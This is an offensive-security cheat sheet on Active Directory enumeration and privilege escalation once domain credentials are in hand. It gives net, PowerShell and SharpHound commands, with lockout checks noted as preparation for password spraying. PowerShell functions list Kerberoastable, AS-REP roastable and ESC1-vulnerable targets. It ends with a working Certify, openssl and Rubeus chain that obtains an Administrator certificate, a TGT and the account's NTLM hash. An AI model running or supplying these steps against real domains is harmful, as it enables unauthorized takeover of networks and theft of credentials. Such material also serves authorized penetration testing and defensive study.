killchain-compendium/Miscellaneous/Active Directory/ad_enumeration.md

Enumerate Active Directory

Enumeration steps once an initial set of domain credentials has been obtained

SYSVOL

  • On Windows, from a host that is not domain joined, use runas with /netonly to start a shell that authenticates to the network as the domain user (the local token is unchanged, and the credentials are only validated when a network resource is accessed, so a typo in the password does not show up until then)
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
  • Validate the credentials against SYSVOL, the DC share that stores the Group Policy Objects (GPOs). Every authenticated domain account can read it, so a successful listing proves the credentials work
    • Point the DNS client at a DC first (PowerShell, elevated), otherwise the domain and DC names will not resolve
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
    • List SYSVOL by hostname to authenticate with Kerberos
dir \\%HOSTNAME%\SYSVOL\
    • List SYSVOL with the DC's IP address instead of the hostname to force NTLM: by default the client cannot build a Kerberos SPN for an IP address and falls back to NTLM. Useful when Kerberos fails, e.g. because of clock skew or DNS problems

Microsoft Management Console (MMC)

  • Use the AD snap-ins from the Remote Server Administration Tools (RSAT); on a host that is not domain joined, start mmc from the runas /netonly shell described in the SYSVOL section
    • Start -> Apps & Features -> Manage Optional Features -> Add a feature -> search RSAT -> select RSAT: Active Directory Domain Services and Lightweight Directory Services Tools -> Install
    • Win + R -> mmc -> File -> Add/Remove Snap-in -> add the three AD snap-ins -> right-click Active Directory Sites and Services -> Change Forest -> enter the root domain -> right-click Active Directory Users and Computers -> Change Domain -> enter the root domain -> right-click Active Directory Users and Computers -> View -> Advanced Features (without this, attribute editors and hidden containers are not shown)
    • Start enumerating by clicking the domain object in the tree on the left
    • Look at the People directory (or whichever OU holds the user accounts in the target domain) and right-click the entries to see their properties
    • With sufficient rights the same snap-in can change or create users and modify group membership

CMD enumeration

Execute from a domain-joined machine (the /domain switch locates the DC through the host's own domain membership)

  • Users
net user /domain
  • Specific user
net user <username> /domain
  • Groups (only global groups are listed; domain local groups such as Administrators need net localgroup <groupname> /domain instead)
net group /domain
  • Specific group
net group <groupname> /domain
  • Password policy (lockout threshold and duration, minimum length and age; check this before any password spraying)
net accounts /domain

Powershell Cmdlets

Require the ActiveDirectory module (part of RSAT); -Server selects the DC to query

  • User details
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
  • Groups
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
  • Group membership
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
  • Generic AD objects, optionally including deleted ones (reading the Deleted Objects container needs administrative rights by default). The second query lists accounts with recent failed logons on the queried DC; badPwdCount is not replicated, so the result differs per DC
Get-ADObject -Filter <filterstuff> -IncludeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
  • Domain
Get-ADDomain -Server exampleDC.com
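The CMD and PowerShell one-liners above answer one question each. The following is an added example (not code from the original page) that runs the usual first-pass questions in one function with the same RSAT ActiveDirectory cmdlets: password policy, Kerberoastable and AS-REP roastable users, accounts with failed logons on the queried DC, and recursive membership of the privileged groups. dc01.example.com is a placeholder; the function assumes the ActiveDirectory module is installed and the running identity can read the domain.

```powershell
# Added example, not from the original page. Assumes the RSAT ActiveDirectory
# module and a reachable DC passed via -Server (e.g. dc01.example.com, placeholder).
Import-Module ActiveDirectory

function Get-AdQuickWins {
    param([Parameter(Mandatory)][string]$Server)

    $domain = Get-ADDomain -Server $Server

    # Lockout threshold/duration decide how aggressive a password spray may be
    $policy = Get-ADDefaultDomainPasswordPolicy -Server $Server

    # Users with an SPN can be Kerberoasted; krbtgt always has one and is noise
    $kerberoastable = Get-ADUser -Server $Server `
        -LDAPFilter '(&(servicePrincipalName=*)(!(samAccountName=krbtgt)))' `
        -Properties servicePrincipalName,pwdLastSet,adminCount

    # DONT_REQ_PREAUTH (userAccountControl bit 0x400000) makes a user AS-REP roastable;
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule
    $asrep = Get-ADUser -Server $Server `
        -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'

    # badPwdCount is not replicated, so this only reflects failures seen by $Server
    $failing = Get-ADObject -Server $Server `
        -LDAPFilter '(&(objectClass=user)(badPwdCount>=1))' -Properties badPwdCount,lastLogon

    # Recursive membership; Enterprise Admins only exists in the forest root, and
    # groups containing foreign security principals can make -Recursive throw, hence try/catch
    $privileged = foreach ($g in 'Domain Admins','Administrators','Enterprise Admins') {
        try {
            Get-ADGroupMember -Server $Server -Identity $g -Recursive |
                Select-Object @{n='Group';e={$g}},samAccountName,objectClass
        } catch { }
    }

    [pscustomobject]@{
        Domain           = $domain.DNSRoot
        LockoutThreshold = $policy.LockoutThreshold
        LockoutDuration  = $policy.LockoutDuration
        MinPasswordLen   = $policy.MinPasswordLength
        Kerberoastable   = $kerberoastable |
            Select-Object samAccountName,adminCount,@{n='SPN';e={$_.servicePrincipalName -join ';'}}
        AsrepRoastable   = $asrep | Select-Object samAccountName
        FailedLogons     = $failing | Select-Object name,badPwdCount
        Privileged       = $privileged
    }
}

# Usage (placeholder DC):
# $r = Get-AdQuickWins -Server dc01.example.com
# $r.Kerberoastable | Format-Table -AutoSize
```

Run it once per DC if you care about badPwdCount, since that attribute is local to each DC. The adminCount column on the Kerberoastable list is worth a look first: an SPN on an account that is (or was) protected by AdminSDHolder is the highest-value roast target.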

Sharphound and Bloodhound

  • BloodHound documentation

  • Switch to the AD user via runas.exe (see the SYSVOL section) and collect with one of the following

    • Sharphound.ps1
    • sharphound.exe
    • Azurehound.ps1 (Azure AD, not the on-premises domain)
  • For example (Default collects group membership, ACLs, trusts, sessions and local group membership; Session collects only logged-on sessions; All collects everything and is the noisiest)

Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
  • Sessions are volatile, so re-collect them after some time to catch users who logged on later
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
  • Start the neo4j database in the foreground (or neo4j start to run it in the background)
neo4j console
  • Start BloodHound (--no-sandbox is needed when running the Electron GUI as root on Linux)
bloodhound --no-sandbox
  • Drag and drop the zip file produced by SharpHound into the GUI
  • Search for AD objects and use the pre-built queries on the Analysis tab to find an attack path; the edge tooltips explain how each relationship is abused
  • The Analysis tab also lists directly exploitable accounts, for example Kerberoastable and AS-REP roastable ones

LDAP

PowerView

WMI

Find Certificates and Private Keys

Active Directory Certificate Services (AD CS) and misconfigured certificate templates can be found with the Certify tool.

  • Enumerate templates the current user can abuse with Certify. The first command prints the CA identifier (host\CA name, the FullName in the output); insert it as the /ca value in the second step. The request below abuses ESC1: a template that lets the enrollee supply the subject alternative name and allows client authentication, so a low-privileged user can request a certificate for Administrator (UserAuthentication is the template name from the example environment)
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
  • Copy the PEM-encoded certificate and private key from the output into cert.pem and convert them to PFX as described in the last line of the output, for example
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  • Request a TGT with the certificate via Rubeus (PKINIT); /getcredentials additionally recovers the account's NTLM hash through the U2U exchange. If an export password was set on the PFX, pass it with /password:
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
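Certify's /vulnerable check reads the template and CA objects in the Configuration partition, which any authenticated user can do. When dropping Certify on the host is not an option, the same ESC1 conditions can be evaluated with the RSAT ActiveDirectory module. The following is an added example (not Certify's code and not from the original page) that flags published templates where the enrollee supplies the subject, no manager approval or authorized signature is required, an authentication EKU is present, and a broad principal holds enrollment rights. It covers only ESC1, a subset of what Certify reports; dc01.example.com is a placeholder.

```powershell
# Added example, not from the original page or Certify. Assumes the RSAT
# ActiveDirectory module and a reachable DC via -Server (dc01.example.com is a placeholder).
Import-Module ActiveDirectory

# EKUs that allow a certificate to be used for Kerberos (PKINIT) logon
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '2.5.29.37.0'               # Any Purpose
)
$EnrollRightGuid     = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'  # Certificate-Enrollment
$AutoEnrollRightGuid = [guid]'a05b8cc2-17bc-11d2-9aed-0000f80367c1'  # Certificate-AutoEnrollment
$LowPrivPrincipals   = 'Authenticated Users','Domain Users','Domain Computers','Everyone','Users'

function Get-Esc1Template {
    param([Parameter(Mandatory)][string]$Server)

    $configNc = (Get-ADRootDSE -Server $Server).configurationNamingContext
    $pkiBase  = "CN=Public Key Services,CN=Services,$configNc"

    # A template is only requestable if at least one enterprise CA publishes it
    $cas = Get-ADObject -Server $Server -SearchBase "CN=Enrollment Services,$pkiBase" `
        -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates,dNSHostName
    $publishedNames = $cas | ForEach-Object { $_.certificateTemplates } | Sort-Object -Unique

    # nTSecurityDescriptor is fetched here so the DACL comes from the same DC as the template
    $templates = Get-ADObject -Server $Server -SearchBase "CN=Certificate Templates,$pkiBase" `
        -LDAPFilter '(objectClass=pKICertificateTemplate)' `
        -Properties 'msPKI-Certificate-Name-Flag','msPKI-Enrollment-Flag','msPKI-RA-Signature',
                    pKIExtendedKeyUsage,nTSecurityDescriptor

    foreach ($t in $templates) {
        if ($publishedNames -notcontains $t.Name) { continue }

        $nameFlag   = [int64]$t.'msPKI-Certificate-Name-Flag'
        $enrollFlag = [int64]$t.'msPKI-Enrollment-Flag'
        $raSigs     = [int]$t.'msPKI-RA-Signature'
        $ekus       = @($t.pKIExtendedKeyUsage | Where-Object { $_ })

        $supplySubject = ($nameFlag -band 0x1) -ne 0      # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        $needsApproval = ($enrollFlag -band 0x2) -ne 0    # CT_FLAG_PEND_ALL_REQUESTS
        # No EKU at all is also usable for authentication
        $authEku = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)

        if (-not $supplySubject -or $needsApproval -or $raSigs -gt 0 -or -not $authEku) { continue }

        # Who can enroll: look for Enroll/AutoEnroll extended rights or GenericAll held by broad groups
        $genericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
        $extRight   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
        $enrollers = foreach ($ace in $t.nTSecurityDescriptor.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value.Split('\')[-1]
            if ($LowPrivPrincipals -notcontains $who) { continue }
            $rights   = $ace.ActiveDirectoryRights
            $isEnroll = (($rights -band $extRight) -ne 0) -and
                        ($ace.ObjectType -in @($EnrollRightGuid, $AutoEnrollRightGuid, [guid]::Empty))
            $isFull   = ($rights -band $genericAll) -eq $genericAll
            if ($isEnroll -or $isFull) { $ace.IdentityReference.Value }
        }

        if ($enrollers) {
            [pscustomobject]@{
                Template  = $t.Name
                CAs       = ($cas | Where-Object { $_.certificateTemplates -contains $t.Name } |
                             ForEach-Object { $_.dNSHostName }) -join ','
                Enrollers = ($enrollers | Sort-Object -Unique) -join ','
            }
        }
    }
}

# Usage (placeholder DC): Get-Esc1Template -Server dc01.example.com | Format-Table -AutoSize
```

Each row names a template to pass as /template and a CA host whose pKIEnrollmentService object gives the /ca value for the Certify request above. The check deliberately stops at ESC1; template write access (ESC4), dangerous CA settings and web enrollment (ESC8) are not covered here.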